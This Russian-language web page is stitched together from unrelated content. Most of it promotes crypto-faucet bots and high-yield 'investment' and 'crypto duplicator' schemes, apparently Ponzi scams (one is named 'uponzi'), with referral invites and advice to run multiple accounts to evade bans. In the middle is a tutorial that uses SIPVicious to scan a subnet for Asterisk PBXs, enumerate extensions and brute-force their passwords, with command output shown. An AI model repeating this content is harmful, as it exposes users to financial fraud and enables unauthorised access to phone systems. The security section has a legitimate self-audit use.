Скрипт для автоматического сбора сатошей с ~50 кранов

ВАЖНО:

• Очень желательно устанавливать скрипт на выделенном сервере, например на бесплатном Amazon.
• Желательно запускать несколько разных копий скрипта на нескольких компьютерах/серверах, по одной копии на каждом.
• Обязательно регистрировать несколько аккаунтов/кошельков, если запускаем на нескольких компьютерах/серверах, на каждом компьютере - свой аккаунт/кошелек, чтобы избежать банов за множественные аккаунты.
• Обязательно устанавливать только указанные версии программ и не обновлять их.

RUN. Инвестиции в доллар - usdbank

ПРОВЕРЕНО
Приглашение.

Особенности:
дают бонус $4 за регистрацию
ежедневные начисления

RUN. Инвестиции в доллар - MoneyVECTOR

ПРОВЕРЕНО
Приглашение.

Бонус при регистрации: $3

RUN. Инвестиции в bitcoin - EarnTomorrow

ПРОВЕРЕНО
Приглашение.

Инвестиционный план один: 10% прибыли в день

RUN. Дубликатор криптовалют - cryptosplit

ПРОВЕРЕНО

Приглашение.

 

1% каждый час, 25% в день или 100% прибыли после 125 часов

Скрипт автоматического сбора сатошей для пяти криптовалют

Особенности:

• абсолютно бесплатен
• не требует ввода капчи

Asterisk - тест безопасности

Не буду рассказывать, как вы должны защищаться отхитрожопых хацкеров, просто посмотрим как можно проверить свой asterisk на дыры.

Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.

Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом. На фряхе 8,0 не захотела работать:)

Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:

1 2 3 4 5

[you@box sipvicious]$ ./svmap 192.168.1.1/24 | SIP Device | User Agent | ------------------------------------- | 192.168.1.103:5060 | Asterisk PBX | [you@box sipvicious]$

Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и отыскать extention’s:

1 2 3 4 5 6 7

[you@box sipvicious]$ ./svwar.py 192.168.1.103 | Extension | Authentication | ------------------------------ | 123 | reqauth | | 100 | reqauth | | 101 | noauth | [you@box sipvicious]$

И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль. Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):

1 2 3 4

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 100 | Extension | Password | ------------------------ | 100 | 100 |

Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:

1 2 3 4

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt | Extension | Password | ------------------------ | 123 | secret |

Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и проверить их в действии. Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика. Но среди сотен extentionов всегда найдется хотя бы один со слабым паролем. Более того, подход “обнаружить bpx, найти extention, подобрать пароль” является одной из самых простых на VoIP.

Сам игрался этой штукой давненько, накатал сюда чисто, что бы не забыть. Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)

RUN. Дубликатор криптовалют - uponzi

ПРОВЕРЕНО
Приглашение

Особенности:

• 10 криптовалют
• ничтожная минималка
• можно выбрать срок инвестиций: